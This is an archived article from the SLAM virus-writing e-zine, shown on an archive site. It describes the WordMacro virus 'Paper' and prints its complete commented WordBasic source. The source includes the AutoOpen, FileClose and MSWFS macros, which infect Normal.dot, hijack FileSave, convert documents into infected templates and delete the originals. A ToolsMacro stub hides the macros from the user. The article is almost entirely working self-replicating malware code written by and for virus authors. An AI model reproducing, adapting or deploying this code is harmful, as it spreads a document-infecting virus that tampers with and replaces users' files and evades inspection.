Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM2.007: Description of the WordMacro Virus Paper

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

[ WordMacro. Paper ]------------- 

˛ VIRUSNAME:      Paper 
˛ SIZE:           3608 Bytes 
˛ ORIGIN:         ????? 
˛ AUTHOR:         Sirius ??? 

->Polymorf        No 
->Stealth         Yes 
->Encrypted       No 
->Retro           No 
----------------------------------


This is one of the rare macro viruses, which don't use the "MacroCopy" command. OK, here is the source code. 

------------------------------------------------------------------------------ 
macro: AUTOEXEC 
~~~~~~~~~~~~~~~ 
'nice macro. ;-)) and still stops a few av macros, too. 

Sub MAIN 
REM	   PAPER SHREDDER   (c) Sirius (alpha CMa), Sirius B White Dwarf 
REM     
REM                                          999999 
REM                                         999999999 
REM                                        999999999999 
REM                                        99999999999999 
REM                                          999999 999999 
REM                                       999999999 99999999 
REM                                  @99999999999999   99999 
REM                                  999999999999999      99 
REM                   99999           9999999999 9999       9 
REM                 99999999            9999999   999 
REM                9999 999999          99999      999 
REM               9999   9999999      999999        99 
REM              999       9999999   999999         99 
REM   99        999         99999999999999999       99 
REM   99      99999999999999999999999999999999      99 
REM   999999999999999999999999999999999999999       9999 
End Sub 

------------------------------------------------------------------------------ 
macro: AUTOOPEN 
~~~~~~~~~~~~~~~ 
Sub MAIN                                          'code starts here 
On Error Resume Next                              'Error Handler 
TemplatePath$ = DefaultDir$(2)                    'Get the Path to Normal.dot 
WorkDirPath$ = DefaultDir$(0)                     'Get the Doc-Path 
NormalPath$ = TemplatePath$ + "\Normal.dot"       'Get Normal.dot 
CurrentFile$ = FileNameFromWindow$()    'Path + filename from the active file 

'Copy the mswFS macro from the active file to normal.dot. 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "mswFS", .Tab = 3 

'Copy the FileClose macro from the active file to normal.dot. 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "FileClose", .Tab = 3 

'and again ... 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "AutoOpen", .Tab = 3 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "AutoExec", .Tab = 3 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "ToolsMacro", .Tab = 3 

'Delete the FileSave macro (Normal.dot) 
ToolsMacro .Name = "FileSave", .Show = 1, .Delete 
'... 
ToolsMacro .Name = "mswFC", .Show = 1, .Delete 
ToolsMacro .Name = "mswAO", .Show = 1, .Delete 

'Rename the mswFS macro to FileSave. 
Organizer .Rename, .Source = NormalPath$, .Name = "mswFS", .NewName = "FileSave", .Tab = 3 
'... 
Organizer .Rename, .Source = NormalPath$, .Name = "FileClose", .NewName = "mswFC", .Tab = 3 
Organizer .Rename, .Source = NormalPath$, .Name = "AutoOpen", .NewName = "mswAO", .Tab = 3 

Err = 0                                           'Set the Error Handler to 0 
End Sub                                           'end. 

------------------------------------------------------------------------------ 
macro: FileClose 
~~~~~~~~~~~~~~~~ 
Sub MAIN                                          'code starts here 
On Error Resume Next                              'Error Handler 
TemplatePath$ = DefaultDir$(2)                    'Get the Path to Normal.dot 
WorkDirPath$ = DefaultDir$(0)                     'Get the Doc-Path 
NormalPath$ = TemplatePath$ + "\Normal.dot"       'Get Normal.dot 
CurrentFile$ = FileNameFromWindow$()    'Path + filename from the active file 

'Copy the mswFS macro from the active file to normal.dot. 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "mswFS", .Tab = 3 
'and again copy the FileClose macro ... 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "FileClose", .Tab = 3 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "AutoOpen", .Tab = 3 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "AutoExec", .Tab = 3 
Organizer .Copy, .Source = CurrentFile$, .Destination = NormalPath$, .Name = "ToolsMacro", .Tab = 3 

'Delete the FileSave macro (Normal.dot) 
ToolsMacro .Name = "FileSave", .Show = 1, .Delete 
'... 
ToolsMacro .Name = "mswFC", .Show = 1, .Delete 
ToolsMacro .Name = "mswAO", .Show = 1, .Delete 

'Rename the mswFS macro to FileSave. 
Organizer .Rename, .Source = NormalPath$, .Name = "mswFS", .NewName = "FileSave", .Tab = 3 
'... 
Organizer .Rename, .Source = NormalPath$, .Name = "FileClose", .NewName = "mswFC", .Tab = 3 
Organizer .Rename, .Source = NormalPath$, .Name = "AutoOpen", .NewName = "mswAO", .Tab = 3 

Err = 0                                     'Set the Error Handler to 0 

FileClose                                   'and close the file. 
End Sub                                     'end. 

------------------------------------------------------------------------------ 
macro: MSWFS 
~~~~~~~~~~~~ 
Sub MAIN                                    'and again the code starts here 
On Error Goto BYE                           'Error Handler 
FileSave                                    'Save the active file. 
On Error Goto BYE                           'Error Handler 
TemplatePath$ = DefaultDir$(2)              'Get again the Path to normal.dot 
WorkDirPath$ = DefaultDir$(0)               'Get the Doc-Path 
CurrentFile$ = FileNameFromWindow$()   'Path + filename from the active file. 
OriginalFile$ = FileName$()            'And now the filename without the Path 
Signature$ = "mswFS" 
                                       'Is the active file already infected? 
SignatureTest$ = UCase$(MacroFileName$(Signature$)) 
                                       'Yo, then 
If SignatureTest$ = UCase$(FileNameFromWindow$()) Then 
Goto BYE                               'go to BYE 
Else                                   'if not, then 
Goto CONTINUEON                        'go to CONTINUEON 
End If 
CONTINUEON: 
ToolsOptionsGeneral .RecentFiles = 0 

NormalPath$ = TemplatePath$ + "\Normal.dot"                  'Get Normal.dot  

'Get now the name of the active file without the extension 
'e.g. if the path of the active file is "c:\windows\virus.doc" 
'then the variable CurrentFileNoExt$ is "virus" 
CurrentFileNoExt$ = FileNameInfo$(FileNameFromWindow$(), 4) 

'Save the file as a template. 
TargetFile$ = TemplatePath$ + "\" + CurrentFileNoExt$ + ".dot" 
FileSaveAs .Name = TargetFile$, .Format = 1, .AddToMru = 0	 

'Copy the macro (AutoExec) from normal.dot to the active file 
Organizer .Copy, .Source = NormalPath$, .Destination = TargetFile$,  .Name = "AutoExec", .Tab = 3 
'and again ... 
Organizer .Copy, .Source = NormalPath$, .Destination = TargetFile$,  .Name = "ToolsMacro", .Tab = 3 

Organizer .Copy, .Source = NormalPath$, .Destination = TargetFile$,  .Name = "FileSave", .Tab = 3 
'Now rename the macro FileSave to mswFS 
Organizer .Rename, .Source = TargetFile$, .Name = "FileSave", .NewName = "mswFS", .Tab = 3 

'Copy the macro mswAO to the active file 
Organizer .Copy, .Source = NormalPath$, .Destination = TargetFile$,  .Name = "mswAO", .Tab = 3 
'and rename it to AutoOpen. 
Organizer .Rename, .Source = TargetFile$, .Name = "mswAO", .NewName = "AutoOpen", .Tab = 3 

'Again copy the macro mswFC to the active file 
Organizer .Copy, .Source = NormalPath$, .Destination = TargetFile$,  .Name = "mswFC", .Tab = 3 
'and rename it to FileClose. 
Organizer .Rename, .Source = TargetFile$, .Name = "mswFC", .NewName = "FileClose", .Tab = 3 

FileSave                                   'Save the active file. 

FileClose                                  'Close it. 

Kill OriginalFile$                         'Delete the not infected file. 
Name TargetFile$ As OriginalFile$          'Copy the infected file to the 
                                           'place of the original file. 
DisableAutoMacros(1)                'Enable the DisableAutoMacros Option, 
FileOpen .Name = OriginalFile$      'open the infected file 
DisableAutoMacros(0)                'and disable the DisableAutoMacros Option 

BYE: 
End Sub                             'the code ends here 

------------------------------------------------------------------------------ 
macro: ToolsMacro 
~~~~~~~~~~~~~~~~~ 
Sub MAIN                            'if someone push the Tools/Macro 
End Sub                             'button, then will nothing happen. 

------------------------------------------------------------------------------


OK, that's it.

- Nightmare Joker -

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
24 Nov 2024
Hi, I noticed a few problems with your website. Is this a good place to send them them? Have an awesome day, Martin
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT